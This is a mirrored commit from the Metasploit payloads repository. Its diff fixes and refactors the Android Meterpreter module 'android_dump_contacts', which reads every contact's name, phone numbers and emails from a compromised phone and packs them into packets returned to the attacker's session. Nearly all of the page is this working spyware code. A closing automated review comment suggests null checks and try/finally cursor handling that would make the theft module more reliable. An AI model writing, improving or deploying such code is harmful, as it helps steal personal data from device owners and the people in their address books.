mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00

fix android_dump_contacts display name duplicated in phone numbers list

Tim 2017-01-21 18:03:36 +08:00
parent a35889aff5
commit 6608944236
No known key found for this signature in database
GPG Key ID: 62361A8B17EEED19

@ -5,6 +5,7 @@ import android.database.Cursor;
import android.net.Uri;
import android.os.Build;
import android.provider.ContactsContract;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
@ -22,10 +23,6 @@ public class android_dump_contacts implements Command {
private static final int TLV_TYPE_CONTACT_NAME = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9010);
private static final String classNameContacts = "android.provider.ContactsContract$Contacts";
private static final String classNameData = "android.provider.ContactsContract$Data";
private static final String classNameEmail = "android.provider.ContactsContract$CommonDataKinds$Email";
private static final String contentUri = "CONTENT_URI";
private static final String _id = "_id";
private static final String displayName = "display_name";
private static final String contactId = "contact_id";
@ -39,48 +36,37 @@ public class android_dump_contacts implements Command {
.getContentResolver();
if (Integer.parseInt(Build.VERSION.RELEASE.substring(0, 1)) >= 2) {
Uri ContactUri = null, PhoneUri = null, EmailUri = null;
Class<?> c = Class.forName(classNameContacts);
ContactUri = (Uri) c.getField(contentUri).get(ContactUri);
Uri ContactUri = ContactsContract.Contacts.CONTENT_URI;
Uri PhoneUri = ContactsContract.CommonDataKinds.Phone.CONTENT_URI;
Uri EmailUri = ContactsContract.CommonDataKinds.Email.CONTENT_URI;
Cursor cur = cr.query(ContactUri, null, null, null, null);
if (cur.getCount() > 0) {
while (cur.moveToNext()) {
TLVPacket pckt = new TLVPacket();
String id = cur.getString(cur.getColumnIndex(_id));
while (cur.moveToNext()) {
TLVPacket pckt = new TLVPacket();
String id = cur.getString(cur.getColumnIndex(_id));
pckt.addOverflow(TLV_TYPE_CONTACT_NAME,
cur.getString(cur.getColumnIndex(displayName)));
c = Class.forName(classNameData);
PhoneUri = (Uri) c.getField(contentUri).get(PhoneUri);
Cursor pCur = cr.query(PhoneUri, null, contactId + " = ?",
new String[]{id}, null);
while (pCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_NUMBER,
pCur.getString(pCur.getColumnIndex(data1)));
}
pCur.close();
c = Class.forName(classNameEmail);
EmailUri = (Uri) c.getField(contentUri).get(EmailUri);
Cursor emailCur = cr.query(EmailUri, null, contactId
+ " = ?", new String[]{id}, null);
while (emailCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_EMAIL, emailCur
.getString(emailCur.getColumnIndex(data1)));
}
emailCur.close();
response.addOverflow(TLV_TYPE_CONTACT_GROUP, pckt);
// Name
pckt.addOverflow(TLV_TYPE_CONTACT_NAME, cur.getString(cur.getColumnIndex(displayName)));
// Number
Cursor pCur = cr.query(PhoneUri, null, contactId + " = ?",
new String[]{id}, null);
while (pCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_NUMBER,
pCur.getString(pCur.getColumnIndex(data1)));
}
pCur.close();
// Email
Cursor emailCur = cr.query(EmailUri, null, contactId
+ " = ?", new String[]{id}, null);
while (emailCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_EMAIL, emailCur
.getString(emailCur.getColumnIndex(data1)));
}
emailCur.close();
response.addOverflow(TLV_TYPE_CONTACT_GROUP, pckt);
}
cur.close();
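Review bot: The three `cr.query(...)` results (`cur`, `pCur`, `emailCur`) are dereferenced without a null check and closed only on the straight-line path, so a null return from the provider raises a NullPointerException and an exception inside one of the `while` loops leaves the open cursors unclosed. `ContentResolver.query` is documented as able to return null, and the `if (cur.getCount() > 0)` line that appears to have been dropped would not have covered that case either. Each cursor would be safer wrapped as `if (pCur != null) { try { while (pCur.moveToNext()) { ... } } finally { pCur.close(); } }`. A one-line comment on the `PhoneUri` assignment would also help, noting that `ContactsContract.CommonDataKinds.Phone.CONTENT_URI` returns only phone rows, which is presumably why the display name no longer appears among the `data1` values. The enclosing method starts and ends outside the visible lines.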